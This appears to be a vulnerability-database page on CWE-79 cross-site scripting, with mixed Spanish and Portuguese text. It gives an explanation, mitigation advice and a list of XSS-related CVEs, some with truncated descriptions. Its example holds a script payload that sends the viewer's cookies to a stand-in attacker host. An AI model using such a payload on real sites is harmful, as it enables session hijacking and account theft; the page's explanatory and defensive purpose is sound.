Fallos del tipo CWE-79

29.250 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2024-8554MEDIUMSourceCodester Clinics Patient Management System users.php cross site scriptingEPSS 0.5%CVE-2025-7429HIGHStored XSSEPSS 0.5%CVE-2022-42993MEDIUMPassword Storage Application v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Setup page.EPSS 0.5%CVE-2024-11901MEDIUMPowerBI Embed Reports <= 1.1.7 - Authenticated (Contributor+) Stored Cross-Site ScriptingEPSS 0.5%CVE-2024-7524MEDIUMFirefox adds web-compatibility shims in place of some tracking scripts blocked by Enhanced Tracking Protection. On a site protected by ContEPSS 0.5%CVE-2025-26907HIGHWordPress Estatik Mortgage Calculator plugin <= 2.0.12 - Local File Inclusion vulnerabilityEPSS 0.5%CVE-2022-42992MEDIUMMultiple stored cross-site scripting (XSS) vulnerabilities in Train Scheduler App v1.0 allow attackers to execute arbitrary web scripts or HEPSS 0.5%CVE-2010-10010LOWStars Alliance PsychoStats login.php cross site scriptingEPSS 0.5%CVE-2020-29027MEDIUMReflected Cross Site ScriptingEPSS 0.5%CVE-2025-7632HIGHStored XSSEPSS 0.5%CVE-2024-7685MEDIUMSourceCodester Kortex Lite Advocate Office Management System adds.php cross site scriptingEPSS 0.5%CVE-2014-125089LOWcention-chatserver InternalChatProtocol.fe _formatBody cross site scriptingEPSS 0.5%CVE-2024-4268MEDIUMUltimate Blocks – WordPress Blocks Plugin <= 3.1.9 - Authenticated(Contributor+) Stored Cross-Site Scripting via Multiple BlocksEPSS 0.5%CVE-2024-3762LOWEmlog Pro Whisper Page twitter.php cross site scriptingEPSS 0.5%CVE-2022-42991MEDIUMA stored cross-site scripting (XSS) vulnerability in Simple Online Public Access Catalog v1.0 allows attackers to execute arbitrary web scriEPSS 0.5%CVE-2025-0530MEDIUMcode-projects Job Recruitment _feedback_system.php cross site scriptingEPSS 0.5%CVE-2024-23896HIGHCross-Site Scripting (XSS) vulnerability in Cups EasyEPSS 0.5%CVE-2022-42206MEDIUMPHPGurukul Hospital Management System In PHP V 4.0 is vulnerable to Cross Site Scripting (XSS) via doctor/view-patient.php, admin/view-patieEPSS 0.5%CVE-2025-7430HIGHStored XSSEPSS 0.5%CVE-2024-2198MEDIUMContact Form by BestWebSoft <= 4.2.8 - Reflected Cross-Site Scripting via cntctfrm_contact_addressEPSS 0.5%